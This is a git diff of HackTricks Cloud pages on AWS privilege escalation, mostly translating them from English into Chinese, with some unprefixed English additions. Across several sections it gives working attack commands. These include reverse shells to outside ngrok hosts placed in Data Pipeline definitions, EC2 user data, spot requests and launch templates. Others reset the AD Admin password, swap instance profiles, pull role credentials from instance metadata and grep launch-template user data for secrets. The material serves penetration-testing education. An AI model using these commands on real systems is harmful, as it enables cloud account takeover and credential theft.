my_pipeline --unique-id unique_string ``` - -After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations: - +在管道创建后,攻击者更新其定义以指示特定的操作或资源创建: ```json { - "objects": [ - { - "id": "CreateDirectory", - "type": "ShellCommandActivity", - "command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'", - "runsOn": { "ref": "instance" } - }, - { - "id": "Default", - "scheduleType": "ondemand", - "failureAndRerunMode": "CASCADE", - "name": "Default", - "role": "assumable_datapipeline", - "resourceRole": "assumable_datapipeline" - }, - { - "id": "instance", - "name": "instance", - "type": "Ec2Resource", - "actionOnTaskFailure": "terminate", - "actionOnResourceFailure": "retryAll", - "maximumRetries": "1", - "instanceType": "t2.micro", - "securityGroups": ["default"], - "role": "assumable_datapipeline", - "resourceRole": "assumable_ec2_profile_instance" - } - ] +"objects": [ +{ +"id": "CreateDirectory", +"type": "ShellCommandActivity", +"command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'", +"runsOn": { "ref": "instance" } +}, +{ +"id": "Default", +"scheduleType": "ondemand", +"failureAndRerunMode": "CASCADE", +"name": "Default", +"role": "assumable_datapipeline", +"resourceRole": "assumable_datapipeline" +}, +{ +"id": "instance", +"name": "instance", +"type": "Ec2Resource", +"actionOnTaskFailure": "terminate", +"actionOnResourceFailure": "retryAll", +"maximumRetries": "1", +"instanceType": "t2.micro", +"securityGroups": ["default"], +"role": "assumable_datapipeline", +"resourceRole": "assumable_ec2_profile_instance" +} +] } ``` - > [!NOTE] -> Note that the **role** in **line 14, 15 and 27** needs to be a role **assumable by datapipeline.amazonaws.com** and the role in **line 28** needs to be a **role assumable by ec2.amazonaws.com with a EC2 profile instance**. 
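To find candidate roles that satisfy the note above you can inspect role trust policies (this is a sketch and assumes you also hold `iam:ListRoles`, which is not part of the privesc set itself; the pipeline id is a placeholder). It also shows the final `datapipeline:ActivatePipeline` step, which is run after the `put-pipeline-definition` command shown below:

```bash
# Roles whose trust policy allows Data Pipeline / EC2 (candidates for the definition)
aws iam list-roles \
  --query "Roles[?contains(to_string(AssumeRolePolicyDocument), 'datapipeline.amazonaws.com')].RoleName"
aws iam list-roles \
  --query "Roles[?contains(to_string(AssumeRolePolicyDocument), 'ec2.amazonaws.com')].RoleName"

# Once the definition has been uploaded, the pipeline still has to be activated
aws datapipeline activate-pipeline --pipeline-id <pipeline-id>
```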
+> 请注意,**第14、15和27行**中的**角色**需要是**可由datapipeline.amazonaws.com假设的角色**,而**第28行**中的角色需要是**可由ec2.amazonaws.com假设的角色,并且具有EC2配置文件实例**。 > -> Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one). - +> 此外,EC2实例将仅能访问可由EC2实例假设的角色(因此您只能窃取那个角色)。 ```bash aws datapipeline put-pipeline-definition --pipeline-id \ - --pipeline-definition file:///pipeline/definition.json +--pipeline-definition file:///pipeline/definition.json ``` +**攻击者制作的** pipeline definition file **包含执行命令或通过 AWS API 创建资源的指令,利用 Data Pipeline 的角色权限来潜在地获得额外的权限。** -The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges. - -**Potential Impact:** Direct privesc to the ec2 service role specified. +**潜在影响:** 直接提升到指定的 ec2 服务角色。 ## References - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md index ce24095ed..7e03bf49e 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md @@ -1,10 +1,10 @@ -# AWS - Directory Services Privesc +# AWS - 目录服务权限提升 {{#include ../../../banners/hacktricks-training.md}} -## Directory Services +## 目录服务 -For more info about directory services check: +有关目录服务的更多信息,请查看: {{#ref}} ../aws-services/aws-directory-services-workdocs-enum.md @@ -12,27 +12,21 @@ For more info about directory services check: ### `ds:ResetUserPassword` -This permission allows to **change** the **password** of any **existent** user in the Active Directory.\ -By default, the only existent user is **Admin**. - +此权限允许**更改**Active Directory中任何**现有**用户的**密码**。\ +默认情况下,唯一的现有用户是**Admin**。 ``` aws ds reset-user-password --directory-id --user-name Admin --new-password Newpassword123. ``` - ### AWS Management Console -It's possible to enable an **application access URL** that users from AD can access to login: +可以启用一个 **应用访问 URL**,让 AD 用户可以登录:
-And then **grant them an AWS IAM role** for when they login, this way an AD user/group will have access over AWS management console: +然后 **授予他们一个 AWS IAM 角色**,以便他们登录,这样 AD 用户/组将能够访问 AWS 管理控制台:
-There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission +显然没有任何方法可以启用应用访问 URL、AWS 管理控制台并授予权限 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md index b4af46712..7648f9be5 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md @@ -4,7 +4,7 @@ ## dynamodb -For more info about dynamodb check: +有关dynamodb的更多信息,请查看: {{#ref}} ../aws-services/aws-dynamodb-enum.md @@ -12,7 +12,7 @@ For more info about dynamodb check: ### Post Exploitation -As far as I know there is **no direct way to escalate privileges in AWS just by having some AWS `dynamodb` permissions**. You can **read sensitive** information from the tables (which could contain AWS credentials) and **write information on the tables** (which could trigger other vulnerabilities, like lambda code injections...) but all these options are already considered in the **DynamoDB Post Exploitation page**: +据我所知,**仅凭一些AWS `dynamodb` 权限没有直接的方法来提升权限**。您可以**从表中读取敏感**信息(可能包含AWS凭证)并**在表中写入信息**(这可能触发其他漏洞,例如lambda代码注入...),但所有这些选项在**DynamoDB Post Exploitation页面**中已经考虑过: {{#ref}} ../aws-post-exploitation/aws-dynamodb-post-exploitation.md @@ -21,7 +21,3 @@ As far as I know there is **no direct way to escalate privileges in AWS just by ### TODO: Read data abusing data Streams {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md index 36ea3bc53..b13111638 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md @@ -6,26 +6,22 @@ ### `ebs:ListSnapshotBlocks`, `ebs:GetSnapshotBlock`, `ec2:DescribeSnapshots` -An attacker with those will be able to potentially **download and analyze volumes snapshots locally** and search for sensitive information in them (like secrets or source code). Find how to do this in: +拥有这些权限的攻击者将能够**在本地下载和分析卷快照**,并在其中搜索敏感信息(如秘密或源代码)。了解如何做到这一点: {{#ref}} ../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md {{#endref}} -Other permissions might be also useful such as: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags` +其他权限也可能有用,例如:`ec2:DescribeInstances`,`ec2:DescribeVolumes`,`ec2:DeleteSnapshot`,`ec2:CreateSnapshot`,`ec2:CreateTags` -The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to e**xtract passwords from a domain controller**. +工具 [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) 执行此攻击以**从域控制器提取密码**。 -**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even get Active Directory passwords). 
+**潜在影响:** 通过在快照中定位敏感信息进行间接权限提升(您甚至可以获取Active Directory密码)。 ### **`ec2:CreateSnapshot`** -Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project. +任何拥有**`EC2:CreateSnapshot`**权限的AWS用户都可以通过创建**域控制器的快照**来窃取所有域用户的哈希值,将其挂载到他们控制的实例上,并**导出NTDS.dit和SYSTEM**注册表蜂巢文件,以便与Impacket的secretsdump项目一起使用。 -You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot. +您可以使用此工具来自动化攻击:[https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy),或者在创建快照后使用之前的技术之一。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md index ad31bde00..965e075df 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md @@ -4,7 +4,7 @@ ## EC2 -For more **info about EC2** check: +有关 **EC2 的更多信息**,请查看: {{#ref}} ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ @@ -12,51 +12,46 @@ For more **info about EC2** check: ### `iam:PassRole`, `ec2:RunInstances` -An attacker could **create and instance attaching an IAM role and then access the instance** to steal the IAM role credentials from the metadata endpoint. +攻击者可以 **创建一个实例并附加 IAM 角色,然后访问该实例** 以从元数据端点窃取 IAM 角色凭证。 -- **Access via SSH** - -Run a new instance using a **created** **ssh key** (`--key-name`) and then ssh into it (if you want to create a new one you might need to have the permission `ec2:CreateKeyPair`). +- **通过 SSH 访问** +使用 **创建的** **ssh 密钥** (`--key-name`) 运行一个新实例,然后 ssh 进入它(如果您想创建一个新的,您可能需要拥有权限 `ec2:CreateKeyPair`)。 ```bash aws ec2 run-instances --image-id --instance-type t2.micro \ - --iam-instance-profile Name= --key-name \ - --security-group-ids +--iam-instance-profile Name= --key-name \ +--security-group-ids ``` +- **通过用户数据访问 rev shell** -- **Access via rev shell in user data** - -You can run a new instance using a **user data** (`--user-data`) that will send you a **rev shell**. You don't need to specify security group this way. - +您可以使用 **用户数据** (`--user-data`) 启动一个新实例,该实例将向您发送一个 **rev shell**。您不需要以这种方式指定安全组。 ```bash echo '#!/bin/bash curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh aws ec2 run-instances --image-id --instance-type t2.micro \ - --iam-instance-profile Name=E \ - --count 1 \ - --user-data "file:///tmp/rev.sh" +--iam-instance-profile Name=E \ +--count 1 \ +--user-data "file:///tmp/rev.sh" ``` - -Be careful with GuradDuty if you use the credentials of the IAM role outside of the instance: +注意,如果您在实例外部使用 IAM 角色的凭据,请小心 GuradDuty: {{#ref}} ../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md {{#endref}} -**Potential Impact:** Direct privesc to a any EC2 role attached to existing instance profiles. +**潜在影响:** 直接提升权限到任何附加到现有实例配置文件的 EC2 角色。 -#### Privesc to ECS - -With this set of permissions you could also **create an EC2 instance and register it inside an ECS cluster**. 
This way, ECS **services** will be **run** in inside the **EC2 instance** where you have access and then you can penetrate those services (docker containers) and **steal their ECS roles attached**. +#### 提升权限到 ECS +通过这组权限,您还可以 **创建一个 EC2 实例并将其注册到 ECS 集群中**。这样,ECS **服务** 将在您有访问权限的 **EC2 实例** 内 **运行**,然后您可以渗透这些服务(docker 容器)并 **窃取其附加的 ECS 角色**。 ```bash aws ec2 run-instances \ - --image-id ami-07fde2ae86109a2af \ - --instance-type t2.micro \ - --iam-instance-profile \ - --count 1 --key-name pwned \ - --user-data "file:///tmp/asd.sh" +--image-id ami-07fde2ae86109a2af \ +--instance-type t2.micro \ +--iam-instance-profile \ +--count 1 --key-name pwned \ +--user-data "file:///tmp/asd.sh" # Make sure to use an ECS optimized AMI as it has everything installed for ECS already (amzn2-ami-ecs-hvm-2.0.20210520-x86_64-ebs) # The EC2 instance profile needs basic ECS access @@ -64,22 +59,20 @@ aws ec2 run-instances \ #!/bin/bash echo ECS_CLUSTER= >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config; ``` - -To learn how to **force ECS services to be run** in this new EC2 instance check: +要学习如何**强制在这个新的 EC2 实例中运行 ECS 服务**,请查看: {{#ref}} aws-ecs-privesc.md {{#endref}} -If you **cannot create a new instance** but has the permission `ecs:RegisterContainerInstance` you might be able to register the instance inside the cluster and perform the commented attack. +如果您**无法创建新实例**但拥有权限 `ecs:RegisterContainerInstance`,您可能能够在集群中注册该实例并执行评论攻击。 -**Potential Impact:** Direct privesc to ECS roles attached to tasks. +**潜在影响:** 直接提升到附加到任务的 ECS 角色。 -### **`iam:PassRole`,** **`iam:AddRoleToInstanceProfile`** - -Similar to the previous scenario, an attacker with these permissions could **change the IAM role of a compromised instance** so he could steal new credentials.\ -As an instance profile can only have 1 role, if the instance profile **already has a role** (common case), you will also need **`iam:RemoveRoleFromInstanceProfile`**. +### **`iam:PassRole`,** **`iam:AddRoleToInstanceProfile`** +与之前的场景类似,拥有这些权限的攻击者可以**更改被攻陷实例的 IAM 角色**,以便窃取新的凭证。\ +由于实例配置文件只能有一个角色,如果实例配置文件**已经有一个角色**(常见情况),您还需要**`iam:RemoveRoleFromInstanceProfile`**。 ```bash # Removing role from instance profile aws iam remove-role-from-instance-profile --instance-profile-name --role-name @@ -87,60 +80,50 @@ aws iam remove-role-from-instance-profile --instance-profile-name --role- # Add role to instance profile aws iam add-role-to-instance-profile --instance-profile-name --role-name ``` +如果**实例配置文件有角色**且攻击者**无法移除它**,还有另一种变通方法。他可以**找到**一个**没有角色的实例配置文件**或**创建一个新的**(`iam:CreateInstanceProfile`),**将**该**角色**添加到该**实例配置文件**(如前所述),并**将实例配置文件**关联到一个被攻陷的**实例:** -If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. He could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the **role** to that **instance profile** (as previously discussed), and **associate the instance profile** compromised to a compromised i**nstance:** - -- If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) \* - +- 如果实例**没有任何实例**配置文件(`ec2:AssociateIamInstanceProfile`)\* ```bash aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id ``` - -**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). 
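Whichever profile-swap variant above is used, the pay-off is read from the instance metadata service from inside the box. A short sketch using IMDSv2 (the role name in the last request is whatever the second request returns):

```bash
# Run inside the compromised instance once the new profile/role is associated
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

# Name of the newly attached role
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# Temporary credentials for that role
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>"
```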
+**潜在影响:** 直接提升权限到不同的 EC2 角色(你需要已经攻陷一个 AWS EC2 实例,并且拥有一些额外的权限或特定的实例配置文件状态)。 ### **`iam:PassRole`((** `ec2:AssociateIamInstanceProfile`& `ec2:DisassociateIamInstanceProfile`) || `ec2:ReplaceIamInstanceProfileAssociation`) -With these permissions it's possible to change the instance profile associated to an instance so if the attack had already access to an instance he will be able to steal credentials for more instance profile roles changing the one associated with it. - -- If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it \* +拥有这些权限后,可以更改与实例关联的实例配置文件,因此如果攻击者已经访问了一个实例,他将能够通过更改与之关联的配置文件来窃取更多实例配置文件角色的凭证。 +- 如果它 **有一个实例配置文件**,你可以 **移除** 实例配置文件 (`ec2:DisassociateIamInstanceProfile`) 并 **关联** 它 \* ```bash aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da aws ec2 disassociate-iam-instance-profile --association-id aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id ``` - -- or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). \* - +- 或 **替换** 被攻陷实例的 **实例配置文件** (`ec2:ReplaceIamInstanceProfileAssociation`). \* ```` ```bash aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name= --association-id ``` ```` - -**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). +**潜在影响:** 直接提升权限到不同的 EC2 角色(您需要已经攻陷一个 AWS EC2 实例,并且拥有一些额外的权限或特定的实例配置文件状态)。 ### `ec2:RequestSpotInstances`,`iam:PassRole` -An attacker with the permissions **`ec2:RequestSpotInstances`and`iam:PassRole`** can **request** a **Spot Instance** with an **EC2 Role attached** and a **rev shell** in the **user data**.\ -Once the instance is run, he can **steal the IAM role**. - +拥有权限 **`ec2:RequestSpotInstances`和`iam:PassRole`** 的攻击者可以 **请求** 一个 **附加了 EC2 角色** 的 **Spot 实例** 和一个 **反向 shell** 在 **用户数据** 中。\ +一旦实例运行,他可以 **窃取 IAM 角色**。 ```bash REV=$(printf '#!/bin/bash curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash ' | base64) aws ec2 request-spot-instances \ - --instance-count 1 \ - --launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}" +--instance-count 1 \ +--launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}" ``` - ### `ec2:ModifyInstanceAttribute` -An attacker with the **`ec2:ModifyInstanceAttribute`** can modify the instances attributes. Among them, he can **change the user data**, which implies that he can make the instance **run arbitrary data.** Which can be used to get a **rev shell to the EC2 instance**. - -Note that the attributes can only be **modified while the instance is stopped**, so the **permissions** **`ec2:StopInstances`** and **`ec2:StartInstances`**. 
+拥有 **`ec2:ModifyInstanceAttribute`** 的攻击者可以修改实例属性。其中,他可以 **更改用户数据**,这意味着他可以使实例 **运行任意数据**。这可以用来获取 **对 EC2 实例的反向 shell**。 +请注意,属性只能在 **实例停止时** **修改**,因此需要 **权限** **`ec2:StopInstances`** 和 **`ec2:StartInstances`**。 ```bash TEXT='Content-Type: multipart/mixed; boundary="//" MIME-Version: 1.0 @@ -171,125 +154,110 @@ printf $TEXT | base64 > "$TEXT_PATH" aws ec2 stop-instances --instance-ids $INSTANCE_ID aws ec2 modify-instance-attribute \ - --instance-id="$INSTANCE_ID" \ - --attribute userData \ - --value file://$TEXT_PATH +--instance-id="$INSTANCE_ID" \ +--attribute userData \ +--value file://$TEXT_PATH aws ec2 start-instances --instance-ids $INSTANCE_ID ``` - -**Potential Impact:** Direct privesc to any EC2 IAM Role attached to a created instance. +**潜在影响:** 直接提升权限到任何附加到创建实例的 EC2 IAM 角色。 ### `ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`,`ec2:ModifyLaunchTemplate` -An attacker with the permissions **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`and `ec2:ModifyLaunchTemplate`** can create a **new Launch Template version** with a **rev shell in** the **user data** and **any EC2 IAM Role on it**, change the default version, and **any Autoscaler group** **using** that **Launch Templat**e that is **configured** to use the **latest** or the **default version** will **re-run the instances** using that template and will execute the rev shell. - +具有权限 **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate` 和 `ec2:ModifyLaunchTemplate`** 的攻击者可以创建一个 **新的启动模板版本**,在 **用户数据** 中包含 **反向 shell** 和 **任何 EC2 IAM 角色**,更改默认版本,任何 **使用** 该 **启动模板** 的 **自动扩展组** 如果配置为使用 **最新** 或 **默认版本**,将会 **重新运行实例**,并执行反向 shell。 ```bash REV=$(printf '#!/bin/bash curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash ' | base64) aws ec2 create-launch-template-version \ - --launch-template-name bad_template \ - --launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}" +--launch-template-name bad_template \ +--launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}" aws ec2 modify-launch-template \ - --launch-template-name bad_template \ - --default-version 2 +--launch-template-name bad_template \ +--default-version 2 ``` - -**Potential Impact:** Direct privesc to a different EC2 role. +**潜在影响:** 直接提升权限到不同的 EC2 角色。 ### `autoscaling:CreateLaunchConfiguration`, `autoscaling:CreateAutoScalingGroup`, `iam:PassRole` -An attacker with the permissions **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** can **create a Launch Configuration** with an **IAM Role** and a **rev shell** inside the **user data**, then **create an autoscaling group** from that config and wait for the rev shell to **steal the IAM Role**. 
- +拥有权限 **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** 的攻击者可以 **创建一个启动配置**,其中包含一个 **IAM 角色** 和一个 **反向 shell** 在 **用户数据** 中,然后 **从该配置创建一个自动扩展组**,并等待反向 shell **窃取 IAM 角色**。 ```bash aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \ - --launch-configuration-name bad_config \ - --image-id ami-0c1bc246476a5572b \ - --instance-type t3.micro \ - --iam-instance-profile EC2-CloudWatch-Agent-Role \ - --user-data "$REV" +--launch-configuration-name bad_config \ +--image-id ami-0c1bc246476a5572b \ +--instance-type t3.micro \ +--iam-instance-profile EC2-CloudWatch-Agent-Role \ +--user-data "$REV" aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-auto-scaling-group \ - --auto-scaling-group-name bad_auto \ - --min-size 1 --max-size 1 \ - --launch-configuration-name bad_config \ - --desired-capacity 1 \ - --vpc-zone-identifier "subnet-e282f9b8" +--auto-scaling-group-name bad_auto \ +--min-size 1 --max-size 1 \ +--launch-configuration-name bad_config \ +--desired-capacity 1 \ +--vpc-zone-identifier "subnet-e282f9b8" ``` - -**Potential Impact:** Direct privesc to a different EC2 role. +**潜在影响:** 直接提升权限到不同的 EC2 角色。 ### `!autoscaling` -The set of permissions **`ec2:CreateLaunchTemplate`** and **`autoscaling:CreateAutoScalingGroup`** **aren't enough to escalate** privileges to an IAM role because in order to attach the role specified in the Launch Configuration or in the Launch Template **you need to permissions `iam:PassRole`and `ec2:RunInstances`** (which is a known privesc). +权限集 **`ec2:CreateLaunchTemplate`** 和 **`autoscaling:CreateAutoScalingGroup`** **不足以提升** 权限到 IAM 角色,因为要附加在启动配置或启动模板中指定的角色 **你需要权限 `iam:PassRole` 和 `ec2:RunInstances`** (这是一种已知的权限提升)。 ### `ec2-instance-connect:SendSSHPublicKey` -An attacker with the permission **`ec2-instance-connect:SendSSHPublicKey`** can add an ssh key to a user and use it to access it (if he has ssh access to the instance) or to escalate privileges. - +拥有权限 **`ec2-instance-connect:SendSSHPublicKey`** 的攻击者可以将 ssh 密钥添加到用户并使用它访问(如果他有对实例的 ssh 访问权限)或提升权限。 ```bash aws ec2-instance-connect send-ssh-public-key \ - --instance-id "$INSTANCE_ID" \ - --instance-os-user "ec2-user" \ - --ssh-public-key "file://$PUBK_PATH" +--instance-id "$INSTANCE_ID" \ +--instance-os-user "ec2-user" \ +--ssh-public-key "file://$PUBK_PATH" ``` - -**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances. +**潜在影响:** 直接提升权限到附加到运行实例的 EC2 IAM 角色。 ### `ec2-instance-connect:SendSerialConsoleSSHPublicKey` -An attacker with the permission **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** can **add an ssh key to a serial connection**. If the serial is not enable, the attacker needs the permission **`ec2:EnableSerialConsoleAccess` to enable it**. - -In order to connect to the serial port you also **need to know the username and password of a user** inside the machine. 
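For the `ec2-instance-connect:SendSSHPublicKey` primitive above, keep in mind that EC2 Instance Connect only accepts the pushed key for roughly 60 seconds, so the SSH session has to follow immediately (paths and the target address are placeholders):

```bash
# The pushed key is only accepted for ~60 seconds, so connect right away
ssh -o IdentitiesOnly=yes -i /path/to/private_key ec2-user@<instance-public-ip>
```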
+拥有权限 **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** 的攻击者可以 **向串行连接添加 ssh 密钥**。如果串行未启用,攻击者需要权限 **`ec2:EnableSerialConsoleAccess` 来启用它**。 +为了连接到串行端口,您还 **需要知道机器内部用户的用户名和密码**。 ```bash aws ec2 enable-serial-console-access aws ec2-instance-connect send-serial-console-ssh-public-key \ - --instance-id "$INSTANCE_ID" \ - --serial-port 0 \ - --region "eu-west-1" \ - --ssh-public-key "file://$PUBK_PATH" +--instance-id "$INSTANCE_ID" \ +--serial-port 0 \ +--region "eu-west-1" \ +--ssh-public-key "file://$PUBK_PATH" ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws ``` +这种方式对提权并不太有用,因为你需要知道用户名和密码才能利用它。 -This way isn't that useful to privesc as you need to know a username and password to exploit it. - -**Potential Impact:** (Highly unprovable) Direct privesc to the EC2 IAM roles attached to running instances. +**潜在影响:**(高度不可证明)直接提权到附加到运行实例的 EC2 IAM 角色。 ### `describe-launch-templates`,`describe-launch-template-versions` -Since launch templates have versioning, an attacker with **`ec2:describe-launch-templates`** and **`ec2:describe-launch-template-versions`** permissions could exploit these to discover sensitive information, such as credentials present in user data. To accomplish this, the following script loops through all versions of the available launch templates: - +由于启动模板具有版本控制,拥有 **`ec2:describe-launch-templates`** 和 **`ec2:describe-launch-template-versions`** 权限的攻击者可以利用这些权限发现敏感信息,例如用户数据中存在的凭证。为此,以下脚本循环遍历所有可用启动模板的版本: ```bash for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId') do - echo "[*] Analyzing $i" - aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata - do - echo "VersionNumber: $version" - echo "$userdata" | base64 -d - echo - done | grep -iE "aws_|password|token|api" +echo "[*] Analyzing $i" +aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata +do +echo "VersionNumber: $version" +echo "$userdata" | base64 -d +echo +done | grep -iE "aws_|password|token|api" done ``` +在上述命令中,尽管我们指定了某些模式(`aws_|password|token|api`),但您可以使用不同的正则表达式来搜索其他类型的敏感信息。 -In the above commands, although we're specifying certain patterns (`aws_|password|token|api`), you can use a different regex to search for other types of sensitive information. +假设我们找到了 `aws_access_key_id` 和 `aws_secret_access_key`,我们可以使用这些凭据来认证到 AWS。 -Assuming we find `aws_access_key_id` and `aws_secret_access_key`, we can use these credentials to authenticate to AWS. +**潜在影响:** 直接提升到 IAM 用户的权限。 -**Potential Impact:** Direct privilege escalation to IAM user(s). 
- -## References +## 参考文献 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md index fd4686edb..e127fbd94 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md @@ -6,21 +6,21 @@ ### `ecr:GetAuthorizationToken`,`ecr:BatchGetImage` -An attacker with the **`ecr:GetAuthorizationToken`** and **`ecr:BatchGetImage`** can login to ECR and download images. +拥有 **`ecr:GetAuthorizationToken`** 和 **`ecr:BatchGetImage`** 的攻击者可以登录 ECR 并下载镜像。 -For more info on how to download images: +有关如何下载镜像的更多信息: {{#ref}} ../aws-post-exploitation/aws-ecr-post-exploitation.md {{#endref}} -**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. +**潜在影响:** 通过拦截流量中的敏感信息进行间接权限提升。 ### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart` -An attacker with the all those permissions **can login to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used. +拥有所有这些权限的攻击者 **可以登录 ECR 并上传镜像**。这对于提升到其他使用这些镜像的环境的权限非常有用。 -To learn how to upload a new image/update one, check: +要了解如何上传新镜像/更新镜像,请查看: {{#ref}} ../aws-services/aws-eks-enum.md @@ -28,85 +28,73 @@ To learn how to upload a new image/update one, check: ### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, 